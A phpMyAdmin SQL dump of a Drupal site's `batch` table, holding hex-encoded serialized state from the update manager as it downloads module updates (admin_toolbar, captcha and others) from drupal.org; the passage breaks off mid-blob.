-- phpMyAdmin SQL Dump
-- version 5.2.0
-- https://www.phpmyadmin.net/
--
-- Host: localhost
-- Generation Time: Aug 28, 2026 at 01:59 PM
-- Server version: 8.0.30
-- PHP Version: 8.1.10

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `comet9`
--

-- --------------------------------------------------------

--
-- Table structure for table `batch`
--

CREATE TABLE `batch` (
  `bid` int UNSIGNED NOT NULL COMMENT 'Primary Key: Unique batch ID.',
  `token` varchar(64) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'A string token generated against the current user''s session id and the batch id, used to ensure that only the user who submitted the batch can effectively access it.',
  `timestamp` bigint NOT NULL COMMENT 'A Unix timestamp indicating when this batch was submitted for processing. Stale batches are purged at cron time.',
  `batch` longblob COMMENT 'A serialized array containing the processing data for the batch.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Stores details about batches (processes that run in…';

--
-- Dumping data for table `batch`
--

INSERT INTO `batch` (`bid`, `token`, `timestamp`, `batch`) VALUES
(12, 'QP-OfJ0TFzqiOeve0b1Bvz0GPEW3WL4m7GS0dVJ06SU', 1781848280, 0x613a31333a7b733a343a2273657473223b613a313a7b693a303b613a31373a7b733a373a2273616e64626f78223b613a303a7b7d733a373a22726573756c7473223b613a303a7b7d733a373a2273756363657373223b623a303b733a353a227374617274223b693a303b733a373a22656c6170736564223b693a303b733a353a227469746c65223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a22446f776e6c6f6164696e672075706461746573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a22696e69745f6d657373616765223b733a34393a22507265706172696e6720746f20646f776e6c6f61642073656c656374656420757064617465733c62722f3e266e6273703b223b733a31363a2270726f67726573735f6d657373616765223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32393a22436f6d706c65746564204063757272656e74206f662040746f74616c2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31333a226572726f725f6d657373616765223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32323a22416e206572726f7220686173206f636375727265642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2266696e6973686564223b733a33383a227570646174655f6d616e616765725f646f776e6c6f61645f62617463685f66696e6973686564223b733a343a2266696c65223b733a33383a22636f72652f6d6f64756c65732f7570646174652f7570646174652e6d616e616765722e696e63223b733a373a226c696272617279223b613a303a7b7d733a31313a2275726c5f6f7074696f6e73223b613a303a7b7d733a31313a2270726f6772657373697665223b623a313b733a353a22746f74616c223b693a353b733a353a22636f756e74223b693a353b733a353a227175657565223b613a323a7b733a343a226e616d65223b733a31373a2264727570616c5f62617463683a31323a30223b733a353a22636c617373223b733a32333a2244727570616c5c436f72655c51756575655c4261746368223b7d7d7d733a31363a226861735f666f726d5f7375626d697473223b623a303b733a31303a22666f726d5f7374617465223b4f3a32363a2244727570616c5c436f72655c466f726d5c466f726d5374617465223a33333a7b733a31363a22002a00636f6d706c6574655f666f726d223b613a33333a7b733a31313a222361747472696275746573223b613a323a7b733a353a22636c617373223b613a313a7b693a303b733a32363a227570646174652d6d616e616765722d7570646174652d666f726d223b7d733a32303a22646174612d64727570616c2d73656c6563746f72223b733a32363a227570646174652d6d616e616765722d7570646174652d666f726d223b7d733a31303a226c6173745f636865636b223b613a31353a7b733a363a22237468656d65223b733a31373a227570646174655f6c6173745f636865636b223b733a353a22236c617374223b693a313738313831353737373b733a353a222374726565223b623a303b733a383a2223706172656e7473223b613a313a7b693a303b733a31303a226c6173745f636865636b223b7d733a31343a222361727261795f706172656e7473223b613a313a7b693a303b733a31303a226c6173745f636865636b223b7d733a373a2223776569676874223b693a303b733a31303a222370726f636573736564223b623a303b733a393a22237265717569726564223b623a303b733a31313a222361747472696275746573223b613a313a7b733a32303a22646174612d64727570616c2d73656c6563746f72223b733a31353a22656469742d6c6173742d636865636b223b7d733a31343a22237469746c655f646973706c6179223b733a363a226265666f7265223b733a32303a22236465736372697074696f6e5f646973706c6179223b733a353a226166746572223b733a373a22236572726f7273223b4e3b733a333a22236964223b733a31353a22656469742d6c6173742d636865636b223b733a373a2223736f72746564223b623a313b733a31303a222376616c696461746564223b623a313b7d733a393a22236174746163686564223b613a333a7b733a373a226c696272617279223b613a313a7b693a303b733a32363a227570646174652f64727570616c2e7570646174652e61646d696e223b7d733a31323a22706c616365686f6c64657273223b613a313a7b733a35353a22666f726d5f616374696f6e5f705f7076646547735647357a4e465f584c4750547659534b436634337438715a59537763665a6c32757a4d223b613a313a7b733a31333a22236c617a795f6275696c646572223b613a323a7b693a303b733a34303a22666f726d5f6275696c6465723a72656e646572506c616365686f6c646572466f726d416374696f6e223b693a313b613a303a7b7d7d7d7d733a31343a2264727570616c53657474696e6773223b613a313a7b733a31343a22616a61785472757374656455726c223b613a313a7b733a35353a22666f726d5f616374696f6e5f705f7076646547735647357a4e465f584c4750547659534b436634337438715a59537763665a6c32757a4d223b623a313b7d7d7d733a31373a2270726f6a6563745f646f776e6c6f616473223b613a31383a7b733a353a222374726565223b623a313b733a31333a2261646d696e5f746f6f6c626172223b613a31393a7b733a353a222374797065223b733a353a2276616c7565223b733a363a222376616c7565223b733a36343a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646d696e5f746f6f6c6261722d332e362e332e7461722e677a223b733a363a2223696e707574223b623a313b733a31353a222376616c75655f63616c6c6261636b223b613a323a7b693a303b733a33323a2244727570616c5c436f72655c52656e6465725c456c656d656e745c56616c7565223b693a313b733a31333a2276616c756543616c6c6261636b223b7d733a31363a222364656661756c74735f6c6f61646564223b623a313b733a353a222374726565223b623a313b733a383a2223706172656e7473223b613a323a7b693a303b733a31373a2270726f6a6563745f646f776e6c6f616473223b693a313b733a31333a2261646d696e5f746f6f6c626172223b7d733a31343a222361727261795f706172656e7473223b613a323a7b693a303b733a31373a2270726f6a6563745f646f776e6c6f616473223b693a313b733a31333a2261646d696e5f746f6f6c626172223b7d733a373a2223776569676874223b693a303b733a31303a222370726f636573736564223b623a303b733a393a22237265717569726564223b623a303b733a31313a222361747472696275746573223b613a313a7b733a32303a22646174612d64727570616c2d73656c6563746f72223b733a33363a22656469742d70726f6a6563742d646f776e6c6f6164732d61646d696e2d746f6f6c626172223b7d733a31343a22237469746c655f646973706c6179223b733a363a226265666f7265223b733a32303a22236465736372697074696f6e5f646973706c6179223b733a353a226166746572223b733a373a22236572726f7273223b4e3b733a333a22236964223b733a33363a22656469742d70726f6a6563742d646f776e6c6f6164732d61646d696e2d746f6f6c626172223b733a353a22236e616d65223b733a33323a2270726f6a6563745f646f776e6c6f6164735b61646d696e5f746f6f6c6261725d223b733a373a2223736f72746564223b623a313b733a31303a222376616c696461746564223b623a313b7d733a373a2263617074636861223b613a31393a7b733a353a222374797065223b733a353a2276616c7565223b733a363a222376616c7565223b733a36313a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f636170746368612d382e782d312e31372e7461722e677a223b733a363a2223696e707574223b623a313b733a31353a222376616c75655f63616c6c6261636b223b613a323a7b693a303b733a33323a2244727570616c5c436f72655c52656e6465725c456c656d656e745c56616c7565223b693a313b733a31333a2276616c756543616c6c6261636b223b7d733a31363a222364656661756c74735f6c6f61646564223b623a313b733a353a222374726565223b623a313b733a383a2223706172656e7473223b613a323a7b693a303b733a31373a2270726f6a6563745f646f776e6c6f616473223b693a313b733a373a2263617074636861223b7d733a31343a222361727261795f706172656e7473223b613a323a7b693a303b733a31373a2270726f6a6563745f646f776e6c6f616473223b693a313b733a373a2263617074636861223b7d733a373a2223776569676874223b643a302e3030313b733a31303a222370726f636573736564223b623a303b733a393a22237265717569726564223b623a303b733a31313a222361747472696275746573223b613a313a7b733a32303a22646174612d64727570616c2d73656c6563746f72223b733a33303a22656469742d70726f6a6563742d646f776e6c6f6164732d63617074636861223b7d733a31343a22237469746c655f646973706c6179223b733a363a226265666f7265223b733a32303a22236465736372697074696f6e5f646973706c6179223b733a353a226166746572223b733a373a22236572726f7273223b4e3b733a333a22236964223b733a33303a22656469742d70726f6a6563742d646f776e6c6f6164732d63617074636861223b733a353a22236e616d65223b733a32363a2270726f6a6563745f646f776e6c6f6164735b636170746368615d223b733a373a2223736f72746564223b623a313b733a31303a222376616c696461746564223b623a313b7d733a31333a226c616e675f64726f70646f776e223b613a31393a7b733a353a222374797065223b733a353a2276616c7565223b733a363a222376616c7565223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f6c616e675f64726f70646f776e2d382e782d322e342e7461722e677a223b733a363a2223696e707574223b623a313b733a31353a222376616c75655f63616c6c6261636b223b613a323a7b693a303b733a33323a2244727570616c5c436f72655c52656e6465725c456c656d656e745c56616c7565223b693a313b733a31333a2276616c756543616c6c6261636b223b7d733a31363a222364656661756c74735f6c6f61646564223b623a313b733a353a222374726565223b623a313b733a383a2223706172656e7473223b613a323a7b693a303b733a31373a2270726f6a6563745f646f776e6c6f616473223b693a313b733a31333a226c616e675f64726f70646f776e223b7d733a31343a222361727261795f706172656e7473223b613a323a7b693a303b733a31373a2270726f6a6563745f646f776e6c6f616473223b693a313b733a31333a226c616e675f64726f70646f776e223b7d733a373a2223776569676874223b643a302e3030323b733a31303a222370726f636573736564223b623a303b733a393a22237265717569726564223b623a303b733a31313a222361747472696275746573223b613a313a7b733a32303a22646174612d64727570616c2d73656c6563746f72223b733a33363a22656469742d70726f6a6563742d646f776e6c6f6164732d6c616e672d64726f70646f776e223b7d733a31343a22237469746c655f646973706c6179223b733a363a226265666f7265223b733a32303a22236465736372697074696f6e5f646973706c6179223b733a353a226166746572223b733a373a22236572726f7273223b4e3b733a333a22236964223b733a33363a22656469742d70726f6a6563742d646f776e6c6f6164732d6c616e672d64726f70646f776e223b733a353a22236e616d65223b733a33323a2270726f6a6563745f646f776e6c6f6164735b6c616e675f64726f70646f776e5d223b733a373a2223736f72746564223b623a313b733a31303a222376616c696461746564223b623a313b7d733a31353a2276696577735f736c69646573686f77223b613a31393a7b733a353a222374797065223b733a353a2276616c7565223b733a363a222376616c7565223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f76696577735f736c69646573686f772d352e302e312e7461722e677a223b733a363a2223696e707574223b623a313b733a31353a222376616c75655f63616c6c6261636b223b613a323a7b693a303b733a33323a2244727570616c5c436f72655c52656e6465725c456c656d656e745c56616c7565223b693a313b733a31333a2276616c756543616c6c6261636b223b7d733a31363a222364656661756c74735f6c6f61646564223b623a313b733a353a222374726565223b623a313b733a383a2223706172656e7473223b613a323a7b693a303b733a31373a2270726f6a6563745f646f776e6c6f616473223b693a313b733a31353a2276696577735f736c69646573686f77223b7d733a31343a222361727261795f706172656e7473223b613a323a7b693a303b733a31373a2270726f6a6563745f646f776e6c6f616473223b693a313b733a31353a2276696577735f736c69646573686f77223b7d733a373a2223776569676874223b643a302e3030333b733a31303a222370726f636573736564223b623a303b733a393a22237265717569726564223b623a303b733a31313a222361747472696275746573223b613a313a7b733a32303a22646174612d64727570616c2d73656c6563746f72223b733a33383a22656469742d70726f6a6563742d646f776e6c6f6164732d76696577732d736c69646573686f77223b7d733a31343a22237469746c655f646973706c6179223b733a363a226265666f7265223b733a32303a22236465736372697074696f6e5f646973706c6179223b733a353a226166746572223b733a373a22236572726f7273223b4e3b733a333a22236964223b733a33383a22656469742d70726f6a6563742d646f776e6c6f6164732d76696577732d736c69646573686f77223b733a353a22236e616d65223b733a33343a2270726f6a6563745f646f776e6c6f6164735b76696577735f736c69646573686f775d223b733a373a2223736f72746564223b623a313b733a31303a222376616c696461746564223b623a313b7d733a31333a2261646170746976657468656d65223b613a31393a7b733a353a222374797065223b733a353a2276616c7565223b733a363a222376616c7565223b733a36363a2268747470733a2f2f6674702e64727570616c2e6f72672f66696c65732f70726f6a656374732f61646170746976657468656d652d382e782d352e342e7461722e677a223b733a363a2223696e707574223b623a313b733a31353a222376616c75655f63616c6c6261636b223b613a323a7b693a303b733a33323a2244727570616c5c436f72655c52656e6465725c456c656d656e745c56616c7565223b693a313b733a31333a2276616c756543616c6c6261636b223b7d733a31363a222364656661756c74735f6c6f61646564223b623a313b733a353a222374726565223b623a313b733a383a2223706172656e7473223b613a323a7b693a303b733a31373a2270726f6a6563745f646f776e6c6f616473223b693a313b733a31333a2261646170746976657468656d65223b7d733a31343a222361727261795f706172656e7473223b613a323a7b693a303b733a31373a2270726f6a6563745f646f776e6c6f616473223b693a313b733a31333a2261646170746976657468656d65223b7d733a373a2223776569676874223b643a302e3030343b733a31303a222370726f636573736564223b623a303b733a393a22237265717569726564223b623a303b733a31313a222361747472696275746573223b613a313a7b733a32303a22646174612d64727570616c2d73656c6563746f72223b733a33363a22656469742d70726f6a6563742d646f776e6c6f6164732d61646170746976657468656d65223b7d733a31343a22237469746c655f646973706c6179223b733a363a226265666f7265223b733a32303a22236465736372697074696f6e5f646973706c6179223b733a353a226166746572223b733a373a22236572726f7273223b4e3b733a333a22236964223b733a33363a22656469742d70726f6a6563742d646f776e6c6f6164732d61646170746976657468656d65223b733a353a22236e616d65223b733a33323a2270726f6a6563745f646f776e6c6f6164735b61646170746976657468656d655d223b733a373a2223736f72746564223b623a313b733a31303a222376616c696461746564223b623a313b7d733a383a2223706172656e7473223b613a313a7b693a303b733a31373a2270726f6a6563745f646f776e6c6f616473223b7d733a31343a222361727261795f706172656e7473223b613a313a7b693a303b733a31373a2270726f6a6563745f646f776e6c6f616473223b7d733a373a2223776569676874223b643a302e3030313b733a31303a222370726f636573736564223b623a303b733a393a22237265717569726564223b623a303b733a31313a222361747472696275746573223b613a313a7b733a32303a22646174612d64727570616c2d73656c6563746f72223b733a32323a22656469742d70726f6a6563742d646f776e6c6f616473223b7d733a31343a22237469746c655f646973706c6179223b733a363a226265666f7265223b733a32303a22236465736372697074696f6e5f646973706c6179223b733a353a226166746572223b733a373a22236572726f7273223b4e3b733a333a22236964223b733a32323a22656469742d70726f6a6563742d646f776e6c6f616473223b733a373a2223736f72746564223b623a313b733a31303a222376616c696461746564223b623a313b7d733a383a2270726f6a65637473223b613a33353a7b733a353a222374797065223b733a31313a227461626c6573656c656374223b733a373a2223686561646572223b613a333a7b733a353a227469746c65223b613a323a7b733a343a2264617461223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a224e616d65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a353a22636c617373223b613a313a7b693a303b733a31393a227570646174652d70726f6a6563742d6e616d65223b7d7d733a31373a22696e7374616c6c65645f76657273696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a22496e7374616c6c65642076657273696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a227265636f6d6d656e6465645f76657273696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a225265636f6d6d656e6465642076657273696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d7d733a383a22236f7074696f6e73223b613a353a7b733a31333a2261646d696e5f746f6f6c626172223b613a343a7b733a353a227469746c65223b613a313a7b733a343a2264617461223b613a323a7b733a363a22237469746c65223b4f3a32353a2244727570616c5c436f72655c47656e6572617465644c696e6b223a353a7b733a31363a22002a0067656e6572617465644c696e6b223b733a37323a223c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646d696e5f746f6f6c626172223e41646d696e20546f6f6c6261723c2f613e223b733a31363a22002a006361636865436f6e7465787473223b613a303a7b7d733a31323a22002a00636163686554616773223b613a303a7b7d733a31343a22002a0063616368654d6178416765223b693a2d313b733a31343a22002a006174746163686d656e7473223b613a303a7b7d7d733a373a22236d61726b7570223b723a3234333b7d7d733a31373a22696e7374616c6c65645f76657273696f6e223b733a353a22332e352e30223b733a31393a227265636f6d6d656e6465645f76657273696f6e223b613a313a7b733a343a2264617461223b613a333a7b733a353a222374797065223b733a31353a22696e6c696e655f74656d706c617465223b733a393a222374656d706c617465223b733a3130343a227b7b2072656c656173655f76657273696f6e207d7d20283c6120687265663d227b7b2072656c656173655f6c696e6b207d7d22207469746c653d227b7b2070726f6a6563745f7469746c65207d7d223e7b7b2072656c656173655f6e6f746573207d7d3c2f613e29223b733a383a2223636f6e74657874223b613a363a7b733a31353a2272656c656173655f76657273696f6e223b733a353a22332e362e33223b733a31323a2272656c656173655f6c696e6b223b733a35393a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f61646d696e5f746f6f6c6261722f72656c65617365732f332e362e33223b733a31333a2270726f6a6563745f7469746c65223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33323a2252656c65617365206e6f74657320666f72204070726f6a6563745f7469746c65223b733a31323a22002a00617267756d656e7473223b613a313a7b733a31343a224070726f6a6563745f7469746c65223b733a31333a2241646d696e20546f6f6c626172223b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a32363a226d616a6f725f7570646174655f7761726e696e675f7469746c65223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32313a224d616a6f722075706772616465207761726e696e67223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a32353a226d616a6f725f7570646174655f7761726e696e675f74657874223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a3230363a2254686973207570646174652069732061206d616a6f722076657273696f6e20757064617465207768696368206d65616e732074686174206974206d6179206e6f74206265206261636b776172647320636f6d70617469626c65207769746820796f75722063757272656e746c792072756e6e696e672076657273696f6e2e204974206973207265636f6d6d656e646564207468617420796f752072656164207468652072656c65617365206e6f74657320616e642070726f6365656420617420796f7572206f776e207269736b2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31333a2272656c656173655f6e6f746573223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a2252656c65617365206e6f746573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d7d7d7d733a31313a222361747472696275746573223b613a313a7b733a353a22636c617373223b613a313a7b693a303b733a31383a227570646174652d7265636f6d6d656e646564223b7d7d7d733a373a2263617074636861223b613a353a7b733a353a227469746c65223b613a313a7b733a343a2264617461223b613a323a7b733a363a22237469746c65223b733a37383a223c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f63617074636861223e434150544348413c2f613e202853656375726974792075706461746529223b733a373a22236d61726b7570223b733a37383a223c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f63617074636861223e434150544348413c2f613e202853656375726974792075706461746529223b7d7d733a31373a22696e7374616c6c65645f76657273696f6e223b733a383a22382e782d312e3135223b733a31393a227265636f6d6d656e6465645f76657273696f6e223b613a313a7b733a343a2264617461223b613a333a7b733a353a222374797065223b733a31353a22696e6c696e655f74656d706c617465223b733a393a222374656d706c617465223b733a3130343a227b7b2072656c656173655f76657273696f6e207d7d20283c6120687265663d227b7b2072656c656173655f6c696e6b207d7d22207469746c653d227b7b2070726f6a6563745f7469746c65207d7d223e7b7b2072656c656173655f6e6f746573207d7d3c2f613e29223b733a383a2223636f6e74657874223b613a363a7b733a31353a2272656c656173655f76657273696f6e223b733a383a22382e782d312e3137223b733a31323a2272656c656173655f6c696e6b223b733a35363a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f636170746368612f72656c65617365732f382e782d312e3137223b733a31333a2270726f6a6563745f7469746c65223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33323a2252656c65617365206e6f74657320666f72204070726f6a6563745f7469746c65223b733a31323a22002a00617267756d656e7473223b613a313a7b733a31343a224070726f6a6563745f7469746c65223b733a373a2243415054434841223b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a32363a226d616a6f725f7570646174655f7761726e696e675f7469746c65223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32313a224d616a6f722075706772616465207761726e696e67223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a32353a226d616a6f725f7570646174655f7761726e696e675f74657874223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a3230363a2254686973207570646174652069732061206d616a6f722076657273696f6e20757064617465207768696368206d65616e732074686174206974206d6179206e6f74206265206261636b776172647320636f6d70617469626c65207769746820796f75722063757272656e746c792072756e6e696e672076657273696f6e2e204974206973207265636f6d6d656e646564207468617420796f752072656164207468652072656c65617365206e6f74657320616e642070726f6365656420617420796f7572206f776e207269736b2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31333a2272656c656173655f6e6f746573223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a2252656c65617365206e6f746573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d7d7d7d733a373a2223776569676874223b693a2d323b733a31313a222361747472696275746573223b613a313a7b733a353a22636c617373223b613a313a7b693a303b733a31353a227570646174652d7365637572697479223b7d7d7d733a31333a226c616e675f64726f70646f776e223b613a343a7b733a353a227469746c65223b613a313a7b733a343a2264617461223b613a323a7b733a363a22237469746c65223b4f3a32353a2244727570616c5c436f72655c47656e6572617465644c696e6b223a353a7b733a31363a22002a0067656e6572617465644c696e6b223b733a38353a223c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f6c616e675f64726f70646f776e223e4c616e67756167652053776974636865722044726f70646f776e3c2f613e223b733a31363a22002a006361636865436f6e7465787473223b613a303a7b7d733a31323a22002a00636163686554616773223b613a303a7b7d733a31343a22002a0063616368654d6178416765223b693a2d313b733a31343a22002a006174746163686d656e7473223b613a303a7b7d7d733a373a22236d61726b7570223b723a3331353b7d7d733a31373a22696e7374616c6c65645f76657273696f6e223b733a373a22382e782d322e31223b733a31393a227265636f6d6d656e6465645f76657273696f6e223b613a313a7b733a343a2264617461223b613a333a7b733a353a222374797065223b733a31353a22696e6c696e655f74656d706c617465223b733a393a222374656d706c617465223b733a3130343a227b7b2072656c656173655f76657273696f6e207d7d20283c6120687265663d227b7b2072656c656173655f6c696e6b207d7d22207469746c653d227b7b2070726f6a6563745f7469746c65207d7d223e7b7b2072656c656173655f6e6f746573207d7d3c2f613e29223b733a383a2223636f6e74657874223b613a363a7b733a31353a2272656c656173655f76657273696f6e223b733a373a22382e782d322e34223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f6c616e675f64726f70646f776e2f72656c65617365732f382e782d322e34223b733a31333a2270726f6a6563745f7469746c65223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33323a2252656c65617365206e6f74657320666f72204070726f6a6563745f7469746c65223b733a31323a22002a00617267756d656e7473223b613a313a7b733a31343a224070726f6a6563745f7469746c65223b733a32363a224c616e67756167652053776974636865722044726f70646f776e223b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a32363a226d616a6f725f7570646174655f7761726e696e675f7469746c65223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32313a224d616a6f722075706772616465207761726e696e67223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a32353a226d616a6f725f7570646174655f7761726e696e675f74657874223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a3230363a2254686973207570646174652069732061206d616a6f722076657273696f6e20757064617465207768696368206d65616e732074686174206974206d6179206e6f74206265206261636b776172647320636f6d70617469626c65207769746820796f75722063757272656e746c792072756e6e696e672076657273696f6e2e204974206973207265636f6d6d656e646564207468617420796f752072656164207468652072656c65617365206e6f74657320616e642070726f6365656420617420796f7572206f776e207269736b2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31333a2272656c656173655f6e6f746573223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a2252656c65617365206e6f746573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d7d7d7d733a31313a222361747472696275746573223b613a313a7b733a353a22636c617373223b613a313a7b693a303b733a31383a227570646174652d7265636f6d6d656e646564223b7d7d7d733a31353a2276696577735f736c69646573686f77223b613a343a7b733a353a227469746c65223b613a313a7b733a343a2264617461223b613a323a7b733a363a22237469746c65223b4f3a32353a2244727570616c5c436f72655c47656e6572617465644c696e6b223a353a7b733a31363a22002a0067656e6572617465644c696e6b223b733a37363a223c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f76696577735f736c69646573686f77223e566965777320536c69646573686f773c2f613e223b733a31363a22002a006361636865436f6e7465787473223b613a303a7b7d733a31323a22002a00636163686554616773223b613a303a7b7d733a31343a22002a0063616368654d6178416765223b693a2d313b733a31343a22002a006174746163686d656e7473223b613a303a7b7d7d733a373a22236d61726b7570223b723a3335333b7d7d733a31373a22696e7374616c6c65645f76657273696f6e223b733a353a22352e302e30223b733a31393a227265636f6d6d656e6465645f76657273696f6e223b613a313a7b733a343a2264617461223b613a333a7b733a353a222374797065223b733a31353a22696e6c696e655f74656d706c617465223b733a393a222374656d706c617465223b733a3130343a227b7b2072656c656173655f76657273696f6e207d7d20283c6120687265663d227b7b2072656c656173655f6c696e6b207d7d22207469746c653d227b7b2070726f6a6563745f7469746c65207d7d223e7b7b2072656c656173655f6e6f746573207d7d3c2f613e29223b733a383a2223636f6e74657874223b613a363a7b733a31353a2272656c656173655f76657273696f6e223b733a353a22352e302e31223b733a31323a2272656c656173655f6c696e6b223b733a36313a2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f76696577735f736c69646573686f772f72656c65617365732f352e302e31223b733a31333a2270726f6a6563745f7469746c65223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33323a2252656c65617365206e6f74657320666f72204070726f6a6563745f7469746c65223b733a31323a22002a00617267756d656e7473223b613a313a7b733a31343a224070726f6a6563745f7469746c65223b733a31353a22566965777320536c69646573686f77223b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a32363a226d616a6f725f7570646174655f7761726e696e675f7469746c65223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32313a224d616a6f722075706772616465207761726e696e67223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a32353a226d616a6f725f7570646174655f7761726e696e675f74657874223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a3230363a2254686973207570646174652069732061206d616a6f722076657273696f6e20757064617465207768696368206d65616e732074686174206974206d6179206e6f74206265206261636b776172647320636f6d70617469626c65207769746820796f75722063757272656e746c792072756e6e696e672076657273696f6e2e204974206973207265636f6d6d656e646564207468617420796f752072656164207468652072656c65617365206e6f74657320616e642070726f6365656420617420796f7572206f776e207269736b2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002